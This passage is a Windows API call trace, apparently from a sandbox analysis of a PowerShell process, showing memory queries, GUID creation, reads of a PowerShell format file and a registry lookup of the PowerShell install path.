Type=0x20000)) returned 0x1c [0029.596] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.596] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.597] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.597] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.597] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.597] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.597] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.598] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x52ca35ff, Data2=0x389a, Data3=0x429b, Data4=([0]=0x80, [1]=0x67, [2]=0xb0, [3]=0x13, [4]=0x12, [5]=0xa9, [6]=0x44, [7]=0xa8))) returned 0x0 [0029.598] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.598] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.599] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.599] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.599] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.599] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.599] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.599] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.599] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.600] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.600] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.600] VirtualQuery (in: lpAddress=0x24d19c, lpBuffer=0x24e19c, dwLength=0x1c | out: lpBuffer=0x24e19c*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.600] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.600] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.601] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.601] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.601] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x733cc728, Data2=0x5408, Data3=0x48f8, Data4=([0]=0xa3, [1]=0xb5, [2]=0x36, [3]=0x6c, [4]=0x31, [5]=0x5, [6]=0x16, [7]=0x84))) returned 0x0 [0029.601] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x7c92e903, Data2=0xff5e, Data3=0x4217, Data4=([0]=0xba, [1]=0x5d, [2]=0xd9, [3]=0x9b, [4]=0xd2, [5]=0xa2, [6]=0xcf, [7]=0xa6))) returned 0x0 [0029.601] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xb309277f, Data2=0xedc3, Data3=0x4f84, Data4=([0]=0x82, [1]=0x2e, [2]=0x98, [3]=0xaa, [4]=0x6b, [5]=0x7e, [6]=0x18, [7]=0x59))) returned 0x0 [0029.602] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x2749795c, Data2=0x43b5, Data3=0x4e9e, Data4=([0]=0xa6, [1]=0x94, [2]=0x9c, [3]=0xe0, [4]=0x59, [5]=0xb0, [6]=0x2c, [7]=0x1f))) returned 0x0 [0029.602] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x5f8591bc, Data2=0x4aa3, Data3=0x4ac1, Data4=([0]=0x9e, [1]=0x76, [2]=0x49, [3]=0x5e, [4]=0x11, [5]=0x89, [6]=0x34, [7]=0xcb))) returned 0x0 [0029.603] VirtualQuery (in: lpAddress=0x24d22c, lpBuffer=0x24e22c, dwLength=0x1c | out: lpBuffer=0x24e22c*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.603] VirtualQuery (in: lpAddress=0x24d268, lpBuffer=0x24e268, dwLength=0x1c | out: lpBuffer=0x24e268*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.603] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x60f5f467, Data2=0x6a2f, Data3=0x46bf, Data4=([0]=0x9e, [1]=0x1d, [2]=0x81, [3]=0x62, [4]=0x9b, [5]=0x98, [6]=0x7c, [7]=0x9b))) returned 0x0 [0029.603] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xc5f7fb7f, Data2=0xbf1b, Data3=0x4c54, Data4=([0]=0xa4, [1]=0xbd, [2]=0x93, [3]=0x69, [4]=0xf6, [5]=0xef, [6]=0xc3, [7]=0x31))) returned 0x0 [0029.603] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x539079df, Data2=0x7a14, Data3=0x4665, Data4=([0]=0xbf, [1]=0xad, [2]=0xe9, [3]=0x1, [4]=0xb0, [5]=0x96, [6]=0x7c, [7]=0x3c))) returned 0x0 [0029.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0029.603] GetLastError () returned 0x0 [0029.603] SetErrorMode (uMode=0x1) returned 0x1 [0029.604] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0029.604] GetLastError () returned 0x0 [0029.604] GetFileType (hFile=0x300) returned 0x1 [0029.604] SetErrorMode (uMode=0x1) returned 0x1 [0029.604] GetFileType (hFile=0x300) returned 0x1 [0029.604] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.605] GetLastError () returned 0x0 [0029.606] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.606] GetLastError () returned 0x0 [0029.606] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.607] GetLastError () returned 0x0 [0029.607] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.607] GetLastError () returned 0x0 [0029.607] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.607] GetLastError () returned 0x0 [0029.608] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.608] GetLastError () returned 0x0 [0029.608] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.608] GetLastError () returned 0x0 [0029.608] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.608] GetLastError () returned 0x0 [0029.608] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.608] GetLastError () returned 0x0 [0029.610] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.610] GetLastError () returned 0x0 [0029.610] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.610] GetLastError () returned 0x0 [0029.610] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.610] GetLastError () returned 0x0 [0029.610] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.610] GetLastError () returned 0x0 [0029.610] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.610] GetLastError () returned 0x0 [0029.610] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.611] GetLastError () returned 0x0 [0029.611] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.611] GetLastError () returned 0x0 [0029.611] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.611] GetLastError () returned 0x0 [0029.613] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.613] GetLastError () returned 0x0 [0029.613] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.613] GetLastError () returned 0x0 [0029.613] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.613] GetLastError () returned 0x0 [0029.613] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.614] GetLastError () returned 0x0 [0029.614] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0xe67, lpOverlapped=0x0) returned 1 [0029.614] GetLastError () returned 0x0 [0029.614] ReadFile (in: hFile=0x300, lpBuffer=0x285f9c3, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x285f9c3*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.614] GetLastError () returned 0x0 [0029.614] ReadFile (in: hFile=0x300, lpBuffer=0x28603bc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x28603bc*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.614] GetLastError () returned 0x0 [0029.614] CloseHandle (hObject=0x300) returned 1 [0029.614] GetLastError () returned 0x0 [0029.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0029.614] GetLastError () returned 0x0 [0029.614] SetErrorMode (uMode=0x1) returned 0x1 [0029.614] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2880c4c | out: lpFileInformation=0x2880c4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0029.614] GetLastError () returned 0x0 [0029.614] SetErrorMode (uMode=0x1) returned 0x1 [0029.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0029.614] GetLastError () returned 0x0 [0029.614] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e638 | out: phkResult=0x24e638*=0x300) returned 0x0 [0029.615] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0x0, lpcbData=0x24e67c*=0x0 | out: lpType=0x24e680*=0x1, lpData=0x0, lpcbData=0x24e67c*=0x56) returned 0x0 [0029.615] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0xd2630, lpcbData=0x24e67c*=0x56 | out: lpType=0x24e680*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e67c*=0x56) returned 0x0 [0029.615] RegCloseKey (hKey=0x300) returned 0x0 [0029.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0029.615] GetLastError () returned 0x0 [0029.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0029.615] GetLastError () returned 0x0 [0029.618] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xbbd93360, Data2=0xa591, Data3=0x4020, Data4=([0]=0x8c, [1]=0xa, [2]=0x90, [3]=0x3e, [4]=0x31, [5]=0x64, [6]=0x73, [7]=0xd7))) returned 0x0 [0029.619] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x54f148e0, Data2=0x92f1, Data3=0x405a, Data4=([0]=0x8f, [1]=0xe6, [2]=0xc6, [3]=0x17, [4]=0x4b, [5]=0x73, [6]=0x53, [7]=0xa1))) returned 0x0 [0029.619] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xfdb9252, Data2=0x17da, Data3=0x4e9d, Data4=([0]=0xa5, [1]=0x58, [2]=0xde, [3]=0xd2, [4]=0xb4, [5]=0x36, [6]=0xc4, [7]=0x55))) returned 0x0 [0029.619] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xc37ddfce, Data2=0x9acf, Data3=0x4227, Data4=([0]=0x9a, [1]=0xfb, [2]=0x23, [3]=0xae, [4]=0xa7, [5]=0xf, [6]=0xe5, [7]=0x41))) returned 0x0 [0029.619] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x319d4586, Data2=0x8a2f, Data3=0x43e7, Data4=([0]=0xad, [1]=0x2f, [2]=0x69, [3]=0x70, [4]=0x13, [5]=0x8f, [6]=0xa0, [7]=0x8))) returned 0x0 [0029.619] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x5df21ee7, Data2=0xc02c, Data3=0x48ff, Data4=([0]=0x98, [1]=0x79, [2]=0x83, [3]=0xa8, [4]=0x47, [5]=0x86, [6]=0x9, [7]=0xdf))) returned 0x0 [0029.619] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xc9ce5cdd, Data2=0xc9a2, Data3=0x4b98, Data4=([0]=0xb6, [1]=0x2f, [2]=0x7a, [3]=0x60, [4]=0x78, [5]=0x6f, [6]=0xea, [7]=0x5e))) returned 0x0 [0029.619] VirtualQuery (in: lpAddress=0x24d400, lpBuffer=0x24e400, dwLength=0x1c | out: lpBuffer=0x24e400*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.620] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x72d5b17, Data2=0x7c11, Data3=0x4746, Data4=([0]=0x94, [1]=0x84, [2]=0x33, [3]=0x28, [4]=0x4d, [5]=0xfa, [6]=0xc2, [7]=0x40))) returned 0x0 [0029.620] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x10b5dcb8, Data2=0x7f22, Data3=0x45ea, Data4=([0]=0x8d, [1]=0x3f, [2]=0xc5, [3]=0x5e, [4]=0x49, [5]=0x17, [6]=0xca, [7]=0x7f))) returned 0x0 [0029.620] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x55e712d0, Data2=0x5263, Data3=0x4b5d, Data4=([0]=0x9d, [1]=0x61, [2]=0x54, [3]=0x7d, [4]=0x91, [5]=0x2e, [6]=0xa0, [7]=0xb1))) returned 0x0 [0029.620] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xb24f4655, Data2=0x6645, Data3=0x492f, Data4=([0]=0xaa, [1]=0xc, [2]=0xc1, [3]=0x94, [4]=0x99, [5]=0x52, [6]=0xea, [7]=0x2))) returned 0x0 [0029.620] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xcb996b18, Data2=0xd23c, Data3=0x44a8, Data4=([0]=0xb1, [1]=0xa8, [2]=0x41, [3]=0xed, [4]=0x3d, [5]=0x18, [6]=0x57, [7]=0xc))) returned 0x0 [0029.620] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x62046639, Data2=0x7d68, Data3=0x400f, Data4=([0]=0x8f, [1]=0xeb, [2]=0x30, [3]=0x70, [4]=0xd3, [5]=0x1b, [6]=0x90, [7]=0xcd))) returned 0x0 [0029.620] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xc711b848, Data2=0xece5, Data3=0x4c1a, Data4=([0]=0xaa, [1]=0xf8, [2]=0x39, [3]=0x53, [4]=0x32, [5]=0xca, [6]=0x3a, [7]=0x4f))) returned 0x0 [0029.620] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x3e6707c9, Data2=0xbd5c, Data3=0x4694, Data4=([0]=0x95, [1]=0x2a, [2]=0xbe, [3]=0xa7, [4]=0x39, [5]=0x87, [6]=0xaf, [7]=0x20))) returned 0x0 [0029.621] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x88993609, Data2=0x7db, Data3=0x4cfb, Data4=([0]=0xb0, [1]=0xf8, [2]=0xec, [3]=0x8, [4]=0x99, [5]=0x22, [6]=0x98, [7]=0xa3))) returned 0x0 [0029.621] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x5357ad76, Data2=0xe032, Data3=0x4339, Data4=([0]=0x96, [1]=0x29, [2]=0x0, [3]=0x57, [4]=0x3c, [5]=0x28, [6]=0x8a, [7]=0xf4))) returned 0x0 [0029.621] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x6b2fc49d, Data2=0x598b, Data3=0x4aaf, Data4=([0]=0xaa, [1]=0x76, [2]=0x58, [3]=0xd9, [4]=0xcc, [5]=0x7b, [6]=0xe6, [7]=0xb9))) returned 0x0 [0029.621] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xdece9e51, Data2=0x674a, Data3=0x4fb1, Data4=([0]=0xae, [1]=0x21, [2]=0x87, [3]=0x8e, [4]=0x94, [5]=0x4b, [6]=0xf6, [7]=0xf4))) returned 0x0 [0029.621] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.622] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.622] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, 